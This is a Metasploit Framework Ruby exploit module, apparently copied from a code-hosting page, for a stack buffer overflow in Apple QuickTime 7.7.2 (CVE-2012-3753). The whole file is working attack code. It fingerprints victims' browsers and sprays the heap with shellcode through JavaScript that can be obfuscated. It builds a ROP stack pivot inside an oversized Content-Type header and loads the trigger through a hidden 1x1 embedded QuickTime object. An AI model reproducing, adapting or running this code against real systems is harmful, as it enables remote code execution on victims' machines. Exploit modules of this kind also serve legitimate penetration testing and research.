230 lines
No EOL
7.1 KiB
Ruby
Executable file
230 lines
No EOL
7.1 KiB
Ruby
Executable file
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
include Msf::Exploit::Remote::Egghunter
|
|
include Msf::Exploit::RopDb
|
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
autopwn_info({
|
|
:os_name => OperatingSystems::WINDOWS,
|
|
:ua_name => HttpClients::SAFARI,
|
|
:ua_maxver => '5.0.1',
|
|
:ua_maxver => '5.1.7',
|
|
:javascript => true,
|
|
:rank => NormalRanking, # reliable memory corruption
|
|
:vuln_test => nil
|
|
})
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Apple QuickTime 7.7.2 MIME Type Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack
|
|
based overflow occurs when processing a malformed Content-Type header. The module
|
|
has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Pavel Polischouk', # Vulnerability discovery
|
|
'juan vazquez' # Metasploit module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2012-3753' ],
|
|
[ 'OSVDB', '87088'],
|
|
[ 'BID', '56438' ],
|
|
[ 'URL', 'http://support.apple.com/kb/HT5581' ],
|
|
[ 'URL', 'http://asintsov.blogspot.com.es/2012/11/heapspray.html' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
'InitialAutoRunScript' => 'migrate -f',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
# Tested with QuickTime 7.7.2
|
|
[ 'Automatic', {} ],
|
|
[ 'Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2',
|
|
{
|
|
'OffsetFirstStackPivot' => 389,
|
|
'OffsetSecondStackPivot' => 105,
|
|
'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
|
|
'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
|
|
'SprayOffset' => 264,
|
|
'SprayedAddress' => 0x60130124
|
|
}
|
|
],
|
|
[ 'Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2',
|
|
{
|
|
'OffsetFirstStackPivot' => 389,
|
|
'OffsetSecondStackPivot' => 105,
|
|
'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,
|
|
'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts
|
|
'SprayOffset' => 264,
|
|
'SprayedAddress' => 0x60130124
|
|
}
|
|
]
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => 'Nov 07 2012',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
|
], self.class
|
|
)
|
|
end
|
|
|
|
def get_target(agent)
|
|
#If the user is already specified by the user, we'll just use that
|
|
return target if target.name != 'Automatic'
|
|
|
|
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
|
|
|
browser_name = ""
|
|
if agent =~ /Safari/ and agent=~ /Version\/5\.1\.7/
|
|
browser_name = "Safari 5.1.7"
|
|
elsif agent =~ /Safari/ and agent=~ /Version\/5\.0\.5/
|
|
browser_name = "Safari 5.0.5"
|
|
end
|
|
|
|
os_name = 'Windows XP SP3'
|
|
|
|
targets.each do |t|
|
|
if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
|
|
print_status("Target selected as: #{t.name}")
|
|
return t
|
|
end
|
|
end
|
|
|
|
return nil
|
|
end
|
|
|
|
def on_request_uri(client, request)
|
|
|
|
agent = request.headers['User-Agent']
|
|
my_target = get_target(agent)
|
|
|
|
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
|
if my_target.nil?
|
|
print_error("Browser not supported: #{agent}")
|
|
send_not_found(cli)
|
|
return
|
|
end
|
|
|
|
return if ((p = regenerate_payload(client)) == nil)
|
|
|
|
if request.uri =~ /\.smil$/
|
|
print_status("Sending exploit (target: #{my_target.name})")
|
|
smil = rand_text_alpha(20)
|
|
type = rand_text_alpha_lower(1)
|
|
subtype = rand_text_alpha_lower(my_target['OffsetSecondStackPivot'])
|
|
subtype << [my_target['SecondStackPivot']].pack("V")
|
|
subtype << [my_target['SprayedAddress']].pack("V")
|
|
subtype << rand_text_alpha_lower(my_target['OffsetFirstStackPivot'] - subtype.length)
|
|
subtype << rand_text_alpha_lower(4)
|
|
subtype << [my_target['FirstStackPivot']].pack("V")
|
|
subtype << rand_text_alpha_lower(10000 - subtype.length)
|
|
send_response(client, smil, { 'Content-Type' => "#{type}/#{subtype}" })
|
|
else
|
|
print_status("Sending initial HTML")
|
|
url = ((datastore['SSL']) ? "https://" : "http://")
|
|
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
|
|
url << ":" + datastore['SRVPORT'].to_s
|
|
url << get_resource
|
|
fname = rand_text_alphanumeric(4)
|
|
|
|
code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
|
|
js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
|
|
offset = rand_text(my_target['SprayOffset'])
|
|
js_offset = Rex::Text.to_unescape(offset, Rex::Arch.endian(my_target.arch))
|
|
fill = rand_text(4)
|
|
js_fill = Rex::Text.to_unescape(fill, Rex::Arch.endian(my_target.arch))
|
|
|
|
# Heap Spray based on http://asintsov.blogspot.com.es/2012/11/heapspray.html
|
|
js = <<-JSSPRAY
|
|
function heapSpray(offset, shellcode, fillsled) {
|
|
var chunk_size, headersize, fillsled_len, code;
|
|
var i, codewithnum;
|
|
chunk_size = 0x40000;
|
|
headersize = 0x10;
|
|
fillsled_len = chunk_size - (headersize + offset.length + shellcode.length);
|
|
while (fillsled.length <fillsled_len)
|
|
fillsled += fillsled;
|
|
fillsled = fillsled.substring(0, fillsled_len);
|
|
code = offset + shellcode + fillsled;
|
|
heap_chunks = new Array();
|
|
for (i = 0; i<1000; i++)
|
|
{
|
|
codewithnum = "HERE" + code;
|
|
heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
|
|
}
|
|
}
|
|
var myoffset = unescape("#{js_offset}");
|
|
var myshellcode = unescape("#{js_code}");
|
|
var myfillsled = unescape("#{js_fill}");
|
|
heapSpray(myoffset,myshellcode,myfillsled);
|
|
JSSPRAY
|
|
|
|
if datastore['OBFUSCATE']
|
|
js = ::Rex::Exploitation::JSObfu.new(js)
|
|
js.obfuscate
|
|
end
|
|
|
|
content = "<html>"
|
|
content << "<head><script>"
|
|
content << "#{js}"
|
|
content << "</script></head>"
|
|
content << "<body>"
|
|
content << <<-ENDEMBED
|
|
<OBJECT
|
|
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
|
|
WIDTH="1"
|
|
HEIGHT="1"
|
|
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
|
|
<PARAM name="SRC" VALUE = "#{url}/#{fname}.smil">
|
|
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil">
|
|
<PARAM name="AUTOPLAY" VALUE = "true" >
|
|
<PARAM name="TYPE" VALUE = "video/quicktime" >
|
|
<PARAM name="TARGET" VALUE = "myself" >
|
|
<EMBED
|
|
SRC = "#{url}/#{fname}.smil"
|
|
QTSRC = "#{url}/#{fname}.smil"
|
|
TARGET = "myself"
|
|
WIDTH = "1"
|
|
HEIGHT = "1"
|
|
AUTOPLAY = "true"
|
|
PLUGIN = "quicktimeplugin"
|
|
TYPE = "video/quicktime"
|
|
CACHE = "false"
|
|
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
|
|
</EMBED>
|
|
</OBJECT>
|
|
ENDEMBED
|
|
content << "</body></html>"
|
|
send_response(client, content, { 'Content-Type' => "text/html" })
|
|
end
|
|
|
|
# Handle the payload
|
|
handler(client)
|
|
end
|
|
|
|
end |